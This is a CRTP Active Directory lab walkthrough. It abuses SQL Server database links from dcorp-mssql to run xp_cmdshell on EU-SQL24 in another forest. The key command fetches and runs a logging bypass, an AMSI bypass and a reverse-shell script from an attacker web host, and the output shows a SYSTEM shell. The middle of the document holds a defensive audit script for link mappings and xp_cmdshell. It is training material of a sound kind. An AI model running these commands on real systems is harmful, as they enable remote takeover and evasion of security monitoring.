# CRTP Lab 22

## Task

Get a reverse shell on a SQL server in the eurocorp forest by abusing database links from dcorp-mssql.

First, enumerate the SQL servers in the domain and check whether the student has privileges to connect to any of them. Run Invishell and use PowerUpSQL to enumerate.

{% code overflow="wrap" %}

```
PS C:\Users\student372> Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.psd1

# Look for SPNs that start with MSSQL* and try to connect to each instance found
PS C:\Users\student372> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
```

{% endcode %}

Since we can connect to dcorp-mssql, we can use Get-SQLServerLinkCrawl to crawl the database links automatically.

{% code overflow="wrap" %}

```
PS C:\Users\student372> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose


VERBOSE:  Server: EU-SQL24
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL24.EU.EUROCORP.LOCAL
VERBOSE:  - Link Login: sa
VERBOSE:  - Link IsSysAdmin: 1
VERBOSE:  - Link Count: 0
VERBOSE:  - Links on this server:
```

{% endcode %}

We have sysadmin on the EU-SQL24 server.

If xp_cmdshell is enabled, it is possible to execute commands on EU-SQL24.

To avoid dealing with a large number of quotes and escapes, use the following command:

{% code overflow="wrap" %}

```
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'set username'"
```

{% endcode %}
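The crawl result above (a link chain that ends in a `sa`-mapped link with `IsSysAdmin: 1`) and the xp_cmdshell check together describe the two misconfigurations this lab depends on. The following PowerShell audit script is an added example, not part of the CRTP lab or PowerUpSQL; it connects to one instance with Windows authentication and reports the same conditions from the server's own catalog views (`sys.servers`, `sys.linked_logins`, `sys.configurations`, `sys.dm_server_services`). The instance name, the connection string and the severity labels are assumptions; reading `sys.linked_logins` and `sys.dm_server_services` requires VIEW ANY DEFINITION and VIEW SERVER STATE, otherwise those result sets come back empty.

```powershell
# Added audit example (not from the lab): report link login mappings, xp_cmdshell
# state and the service account on a single SQL Server instance.
# Assumption: Windows-auth connection to $Instance is possible from this host.
param(
    [Parameter(Mandatory)][string]$Instance   # e.g. 'dcorp-mssql.dollarcorp.moneycorp.local'
)

function Invoke-AuditQuery {
    param([System.Data.SqlClient.SqlConnection]$Connection, [string]$Query)
    $cmd = $Connection.CreateCommand()
    $cmd.CommandText = $Query
    $reader = $cmd.ExecuteReader()
    $table = New-Object System.Data.DataTable
    $table.Load($reader)
    $reader.Close()
    return ,$table
}

$conn = New-Object System.Data.SqlClient.SqlConnection(
    "Server=$Instance;Database=master;Integrated Security=SSPI;Encrypt=True;TrustServerCertificate=True")
$conn.Open()
try {
    # 1. Linked servers and their login mappings. A fixed remote login (remote_name,
    #    e.g. 'sa') with local_principal_id = 0 means every local login that can reach
    #    the link acts as that remote account on the far side. uses_self_credential = 1
    #    (pass-through of the caller's identity) is the safer mapping. RPC Out is what
    #    lets "EXECUTE (...) AT linkedserver" run statements such as xp_cmdshell remotely.
    $links = Invoke-AuditQuery $conn @"
SELECT s.name, s.data_source, s.is_rpc_out_enabled,
       ll.local_principal_id, ll.uses_self_credential, ll.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
"@
    foreach ($row in $links.Rows) {
        $mapping = if ($row.uses_self_credential -eq $true) { 'pass-through (self)' }
                   elseif ([string]::IsNullOrEmpty($row.remote_name)) { 'no mapping' }
                   else { "fixed remote login '$($row.remote_name)'" }
        $scope = if ($row.local_principal_id -eq 0) { 'ALL local logins' }
                 else { "local principal $($row.local_principal_id)" }
        $sev = if ($row.remote_name -eq 'sa' -and $row.local_principal_id -eq 0) { 'HIGH' } else { 'info' }
        '[{0}] link {1} -> {2}: {3} map to {4}; RPC Out={5}' -f `
            $sev, $row.name, $row.data_source, $scope, $mapping, $row.is_rpc_out_enabled
    }

    # 2. xp_cmdshell. value_in_use = 1 means OS command execution is one query away for
    #    any sysadmin, including one that arrives over a link. The fix is
    #    EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
    $cfg = Invoke-AuditQuery $conn "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'"
    if ($cfg.Rows.Count -gt 0 -and $cfg.Rows[0].value_in_use -eq 1) {
        '[HIGH] xp_cmdshell is enabled'
    } else {
        '[info] xp_cmdshell is disabled'
    }

    # 3. Service account. xp_cmdshell run by a sysadmin executes as the SQL Server
    #    service account, which is why the lab's shell arrives as SYSTEM. A virtual or
    #    managed service account bounds what such a shell can do on the host.
    $svc = Invoke-AuditQuery $conn "SELECT servicename, service_account FROM sys.dm_server_services WHERE servicename LIKE 'SQL Server (%'"
    foreach ($row in $svc.Rows) {
        $sev = if ($row.service_account -match 'SYSTEM|Administrator') { 'HIGH' } else { 'info' }
        '[{0}] {1} runs as {2}' -f $sev, $row.servicename, $row.service_account
    }
}
finally {
    $conn.Close()
}
```

Run it once per instance (`.\Audit-SqlLinks.ps1 -Instance dcorp-mssql`, file name assumed) and follow each reported link to the next instance by hand; that reproduces what Get-SQLServerLinkCrawl walks automatically, but from the viewpoint of someone deciding which link mapping to change to pass-through and where to leave xp_cmdshell disabled.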

To get a reverse shell, we'll use Invoke-PowerShellTcpEx.ps1.

Create a copy of Invoke-PowerShellTcpEx.ps1 and rename it to Invoke-PowerShellTcpEx1.ps1.

Append `Power -Reverse -IPAddress 172.16.100.X -Port 443` (without the backticks) to the end of the file.

Host the files on the attacker HTTP server and start a listener using netcat.

{% code overflow="wrap" %}

```
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.72/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/Invoke-PowerShellTcpEx1.ps1)"''' -QueryTarget eu-sql24
```

{% endcode %}

On the listener:

{% code overflow="wrap" %}

```
C:\Users\student372>cd C:\AD\Tools\netcat-win32-1.12\

C:\AD\Tools\netcat-win32-1.12>nc64.exe -lvnp 443
listening on [any] 443 ...
connect to [172.16.100.72] from (UNKNOWN) [172.16.15.17] 56942
Windows PowerShell running as user SYSTEM on EU-SQL24
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>
```

{% endcode %}
